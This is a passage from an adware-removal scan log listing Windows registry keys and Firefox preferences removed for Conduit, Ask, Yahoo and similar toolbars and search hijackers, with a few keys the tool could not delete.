[-] Key Deleted : HKCU\Software\YahooPartnerToolbar
[-] Key Deleted : HKCU\Software\DriverFinder
[-] Key Deleted : HKCU\Software\Yahoo\Companion
[-] Key Deleted : HKCU\Software\Yahoo\YFriendsBar
[-] Key Deleted : HKCU\Software\AppDataLow\Toolbar
[-] Key Deleted : HKCU\Software\AppDataLow\Software\AskToolbar
[-] Key Deleted : HKCU\Software\AppDataLow\Software\BackgroundContainer
[-] Key Deleted : HKCU\Software\AppDataLow\Software\Conduit
[-] Key Deleted : HKCU\Software\AppDataLow\Software\ConduitSearchScopes
[-] Key Deleted : HKCU\Software\AppDataLow\Software\Yahoo\Companion
[-] Key Deleted : HKCU\Software\AppDataLow\Software\TelevisionFanaticEI
[-] Key Deleted : HKLM\SOFTWARE\APN
[-] Key Deleted : HKLM\SOFTWARE\AskToolbar
[-] Key Deleted : HKLM\SOFTWARE\Conduit
[-] Key Deleted : HKLM\SOFTWARE\Freeze.com
[-] Key Deleted : HKLM\SOFTWARE\ParetoLogic
[-] Key Deleted : HKLM\SOFTWARE\SweetIM
[-] Key Deleted : HKLM\SOFTWARE\Trymedia Systems
[-] Key Deleted : HKLM\SOFTWARE\Uniblue
[-] Key Deleted : HKLM\SOFTWARE\Updater By Sweetpacks
[-] Key Deleted : HKLM\SOFTWARE\Mindspark
[-] Key Deleted : HKLM\SOFTWARE\SPPDCOM
[-] Key Deleted : HKLM\SOFTWARE\DriverFinder
[-] Key Deleted : HKLM\SOFTWARE\W3I
[-] Key Deleted : HKLM\SOFTWARE\Yahoo\Companion
[-] Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\Video Converter
[-] Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\PDF Reader Packages
[-] Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{EBE677C0-CBCB-4EBF-8098-E27E1B5271CF}
[-] Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DMUninstaller
[-] Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Yahoo! Toolbar
[-] Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Yahoo! Companion
[-] Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DriverFinder
[-] Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\TelevisionFanaticbar Uninstall
[!] Key Not Deleted : [x64] HKCU\Software\APN PIP
[!] Key Not Deleted : [x64] HKCU\Software\APN
[!] Key Not Deleted : [x64] HKCU\Software\BackgroundContainer
[!] Key Not Deleted : [x64] HKCU\Software\Conduit
[!] Key Not Deleted : [x64] HKCU\Software\IM
[!] Key Not Deleted : [x64] HKCU\Software\ImInstaller
[!] Key Not Deleted : [x64] HKCU\Software\InstallCore
[!] Key Not Deleted : [x64] HKCU\Software\ParetoLogic
[!] Key Not Deleted : [x64] HKCU\Software\smartbarbackup
[!] Key Not Deleted : [x64] HKCU\Software\smartbarlog
[!] Key Not Deleted : [x64] HKCU\Software\Softonic
[!] Key Not Deleted : [x64] HKCU\Software\SweetIM
[!] Key Not Deleted : [x64] HKCU\Software\tuguu sl
[!] Key Not Deleted : [x64] HKCU\Software\YahooPartnerToolbar
[!] Key Not Deleted : [x64] HKCU\Software\DriverFinder
[!] Key Not Deleted : [x64] HKCU\Software\Yahoo\Companion
[!] Key Not Deleted : [x64] HKCU\Software\Yahoo\YFriendsBar
[-] Key Deleted : [x64] HKLM\SOFTWARE\DomaIQ
[-] Key Deleted : [x64] HKLM\SOFTWARE\Tarma Installer
[-] Key Deleted : [x64] HKLM\SOFTWARE\Updater By Sweetpacks
[!] Key Not Deleted : HKU\S-1-5-21-2815594105-2774959023-4293743994-1001\Software\AppDataLow\Software\AskToolbar
[!] Key Not Deleted : HKU\S-1-5-21-2815594105-2774959023-4293743994-1001\Software\AppDataLow\Software\BackgroundContainer
[!] Key Not Deleted : HKU\S-1-5-21-2815594105-2774959023-4293743994-1001\Software\AppDataLow\Software\Conduit
[!] Key Not Deleted : HKU\S-1-5-21-2815594105-2774959023-4293743994-1001\Software\AppDataLow\Software\ConduitSearchScopes
[!] Key Not Deleted : HKU\S-1-5-21-2815594105-2774959023-4293743994-1001\Software\AppDataLow\Software\Yahoo\Companion
[!] Key Not Deleted : HKU\S-1-5-21-2815594105-2774959023-4293743994-1001\Software\AppDataLow\Software\TelevisionFanaticEI
[-] Key Deleted : HKLM\SOFTWARE\Classes\Installer\Features\0C776EBEBCBCFBE408892EE7B12517FC
[-] Key Deleted : HKLM\SOFTWARE\Classes\Installer\Features\A28B4D68DEBAA244EB686953B7074FEF
[-] Key Deleted : HKLM\SOFTWARE\Classes\Installer\Features\DE2353A3121A7924AAF4076BE0B46D13
[-] Key Deleted : HKLM\SOFTWARE\Classes\Installer\Products\0C776EBEBCBCFBE408892EE7B12517FC
[-] Key Deleted : HKLM\SOFTWARE\Classes\Installer\Products\A28B4D68DEBAA244EB686953B7074FEF
[-] Key Deleted : HKLM\SOFTWARE\Classes\Installer\Products\DE2353A3121A7924AAF4076BE0B46D13
[-] Key Deleted : [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\0C776EBEBCBCFBE408892EE7B12517FC
[-] Key Deleted : [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\0CFE535C35F99574E8340BFA75BF92C2
[-] Key Deleted : [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\261F213D1F55267499B1F87D0CC3BCF7
[-] Key Deleted : [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\649A52D257CA5DB4EAAE8BA9EB23E467
[-] Key Deleted : [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\120DFADEB50841F408F04D2A278F9509
[-] Key Deleted : [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\0C776EBEBCBCFBE408892EE7B12517FC
[-] Key Deleted : [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\DE2353A3121A7924AAF4076BE0B46D13
[-] Key Deleted : [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UpgradeCodes\5E8031606EB60A64C882918F8FF38DD4
[-] Key Deleted : [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UpgradeCodes\F928123A039649549966D4C29D35B1C9
[-] Data Restored : HKCU\Software\Microsoft\Internet Explorer\Search [Default_Search_URL]
[-] Data Restored : HKCU\Software\Microsoft\Internet Explorer\Search [SearchAssistant]
[-] Data Restored : HKCU\Software\Microsoft\Internet Explorer\SearchUrl [Default]
[-] Data Restored : HKU\S-1-5-21-2815594105-2774959023-4293743994-1001\Software\Microsoft\Internet Explorer\Search [Default_Search_URL]
[-] Data Restored : HKU\S-1-5-21-2815594105-2774959023-4293743994-1001\Software\Microsoft\Internet Explorer\Search [SearchAssistant]
[-] Data Restored : HKU\S-1-5-21-2815594105-2774959023-4293743994-1001\Software\Microsoft\Internet Explorer\SearchUrl [Default]

***** [ Web browsers ] *****

[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("CT3309762.1000082.isPlayDisplay", "true");
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("CT3309762.1000082.state", "{\"state\":\"stopped\",\"text\":\"Californi...\",\"description\":\"California Rock - Rock\",\"url\":\"hxxp://www.feedlive.net/california.asx\"}");
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("CT3309762.1000234.TWC_TMP_city", "ELLIJAY");
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("CT3309762.1000234.TWC_TMP_country", "US");
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("CT3309762.1000234.TWC_country", "UNITED STATES");
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("CT3309762.1000234.TWC_locId", "USGA0198");
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("CT3309762.1000234.TWC_location", "Ellijay, GA");
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("CT3309762.1000234.TWC_region", "US");
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("CT3309762.1000234.TWC_temp_dis", "f");
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("CT3309762.1000234.TWC_wind_dis", "mph");
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("CT3309762.ENABALE_HISTORY", "{\"dataType\":\"string\",\"data\":\"true\"}");
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("CT3309762.ENABLE_RETURN_WEB_SEARCH_ON_THE_PAGE", "{\"dataType\":\"string\",\"data\":\"true\"}");
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("CT3309762.FF19Solved", "true");
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("CT3309762.FirstTime", "true");
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("CT3309762.FirstTimeFF3", "true");
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("CT3309762.RestartDialogFirstTime", "false");
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("CT3309762.RestartDialogShouldDisplay", "false");
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("CT3309762.SearchAppState.enc", "Mg==");
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("CT3309762.SearchAppTracking.enc", "MQ==");
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("CT3309762.SearchFromAddressBarUrl", "hxxp://search.conduit.com/ResultsExt.aspx?ctid=CT3309762&SearchSource=2&CUI=UN66126008119710230&UM=2&q=");
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("CT3309762.UserID", "UN66126008119710230");
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("CT3309762.addressBarTakeOverEnabledInHidden", "true");
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("CT3309762.appOptions", "{\"1396366938000\":{\"render\":true,\"disabled\":true,\"appGuid\":\"7e25f3b2-a1a2-4bf5-9496-04442c710f40\",\"appClientGuid\":\"\",\"isPersonalApp\":false},\"13018964[...]
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("CT3309762.browser.search.defaultthis.engineName", "true");
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("CT3309762.countryCode", "US");
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("CT3309762.defaultSearch", "true");
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("CT3309762.embeddedsData", "[{\"appId\":\"130189644128799177\",\"apiPermissions\":{\"crossDomainAjax\":true,\"getMainFrameTitle\":true,\"getMainFrameUrl\":true,\"getSearchTerm\":true,\"insta[...]
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("CT3309762.enableAlerts", "true");
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("CT3309762.enableSearchFromAddressBar", "true");
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("CT3309762.firstTimeDialogOpened", "true");
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("CT3309762.fixPageNotFoundError", "true");
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("CT3309762.fixPageNotFoundErrorByUser", "true");
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("CT3309762.fixPageNotFoundErrorInHidden", "true");
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("CT3309762.fullUserID", "UN66126008119710230.IN.20131124193219");
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("CT3309762.installDate", "24/11/2013 19:32:20");
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("CT3309762.installId", "cidst");
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("CT3309762.installSessionId", "{CE09FB7A-52DB-4CCA-8A13-05B5CC09F431}");
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("CT3309762.installSp", "TRUE");
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("CT3309762.installType", "conduitnsisintegration");
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("CT3309762.installUsage", "2015-04-10T16:42:42.1354771+03:00");
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("CT3309762.installUsageEarly", "2015-04-10T16:42:39.1042853+03:00");
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("CT3309762.installerVersion", "1.8.1.4");
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("CT3309762.isCheckedStartAsHidden", true);
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("CT3309762.isEnableAllDialogs", "{\"dataType\":\"string\",\"data\":\"true\"}");
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("CT3309762.isFirstTimeToolbarLoading", "false");
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("CT3309762.isToolbarShrinked", "{\"dataType\":\"string\",\"data\":\"false\"}");
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("CT3309762.keyword", true);
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("CT3309762.lastNewTabSettings", "{\"isEnabled\":false,\"newTabUrl\":\"hxxp://search.conduit.com/?gd=&ctid=CT3309762&octid=CT3309762&ISID=ISID_ID&SearchSource=15&CUI=UN66126008119710230&Lay=1[...]
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("CT3309762.lastVersion", "10.38.0.509");
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("CT3309762.navigationAliasesJson", "{\"EB_SEARCH_TERM\":\"\",\"EB_MAIN_FRAME_URL\":\"about%3Ablank\",\"EB_MAIN_FRAME_TITLE\":\"\",\"EB_TOOLBAR_SUB_DOMAIN\":\"hxxp://Protected.OurToolbar.com/[...]
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("CT3309762.openThankYouPage", "false");
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("CT3309762.openUninstallPage", "true");
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("CT3309762.originalHomepage", "hxxp://search.conduit.com/Results.aspx?ctid=CT3315039&searchsource=55&UM=2&");
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("CT3309762.originalSearchAddressUrl", "hxxp://feed.snap.do/?publisher=QuickObrw&dpid=QuickObrw&co=US&userid=9b727026-70c1-4247-99a0-7c2d64d1b1c7&searchtype=ds&installDate=05/10/2013&q=");
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("CT3309762.originalSearchEngine", "Protected Search");
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("CT3309762.originalSearchEngineName", "Protected Search");
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("CT3309762.performedDomainChangesMigration", "true");
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("CT3309762.revertSettingsEnabled", "false");
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("CT3309762.search.searchAppId", "130189644128799177");
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("CT3309762.search.searchCount", "0");
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("CT3309762.searchFromAddressBarEnabledByUser", "true");
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("CT3309762.searchInNewTabEnabledByUser", "true");
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("CT3309762.searchInNewTabEnabledInHidden", "true");
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("CT3309762.searchRevert", "false");
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("CT3309762.searchSuggestEnabledByUser", "true");
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("CT3309762.searchUninstallUserMode", "2");
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("CT3309762.searchUserMode", "2");
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("CT3309762.selectToSearchBoxEnabled", "{\"dataType\":\"string\",\"data\":\"true\"}");
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("CT3309762.serviceLayer_service_login_isFirstLoginInvoked", "{\"dataType\":\"boolean\",\"data\":\"true\"}");
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("CT3309762.serviceLayer_service_login_loginCount", "{\"dataType\":\"number\",\"data\":\"4\"}");
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("CT3309762.serviceLayer_service_toolbarGrouping_activeCTID", "{\"dataType\":\"string\",\"data\":\"CT3309762\"}");
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("CT3309762.serviceLayer_service_toolbarGrouping_activeDownloadUrl", "{\"dataType\":\"string\",\"data\":\"hxxp://Protected.OurToolbar.com//xpi\"}");
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("CT3309762.serviceLayer_service_toolbarGrouping_activeToolbarName", "{\"dataType\":\"string\",\"data\":\"Protected \"}");
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("CT3309762.serviceLayer_service_toolbarGrouping_invoked", "{\"dataType\":\"string\",\"data\":\"true\"}");
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("CT3309762.serviceLayer_service_usage_toolbarUsageCount", "{\"dataType\":\"number\",\"data\":\"2\"}");
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("CT3309762.serviceLayer_services_Configuration_lastUpdate", "1441309951840");
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("CT3309762.serviceLayer_services_appTrackingFirstTime_lastUpdate", "1441055993644");
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("CT3309762.serviceLayer_services_appsMetadata_lastUpdate", "1441309951511");
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("CT3309762.serviceLayer_services_gottenAppsContextMenu_lastUpdate", "1441055995837");
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("CT3309762.serviceLayer_services_installUsage_ToolbarInstallEarly_lastUpdate", "1428673342248");
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("CT3309762.serviceLayer_services_installUsage_ToolbarInstall_lastUpdate", "1428673345319");
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("CT3309762.serviceLayer_services_login_10.22.5.10_lastUpdate", "1428673346300");
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("CT3309762.serviceLayer_services_login_10.37.0.508_lastUpdate", "1441102812074");
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("CT3309762.serviceLayer_services_login_10.38.0.509_lastUpdate", "1441309722239");
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("CT3309762.serviceLayer_services_otherAppsContextMenu_lastUpdate", "1441055998453");
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("CT3309762.serviceLayer_services_searchAPI_lastUpdate", "1441309953055");
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("CT3309762.serviceLayer_services_serviceMap_lastUpdate", "1441309950867");
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("CT3309762.serviceLayer_services_toolbarContextMenu_lastUpdate", "1441309951390");
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("CT3309762.serviceLayer_services_toolbarSettings_lastUpdate", "1441309722282");
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("CT3309762.serviceLayer_services_translation_lastUpdate", "1441309950709");
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("CT3309762.settingsINI", true);
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("CT3309762.shouldFirstTimeDialog", "false");
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("CT3309762.showToolbarPermission", "false");
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("CT3309762.smartbar.CTID", "CT3309762");
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("CT3309762.smartbar.Uninstall", "0");
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("CT3309762.smartbar.homepage", true);
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("CT3309762.smartbar.toolbarName", "Protected ");
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("CT3309762.startPage", "true");
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("CT3309762.toolbarBornServerTime", "10-4-2015");
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("CT3309762.toolbarCurrentServerTime", "3-9-2015");
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("CT3309762.toolbarDisabled", "true");
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("CT3309762.toolbarInstallDate", "24-11-2013 19:32:19");
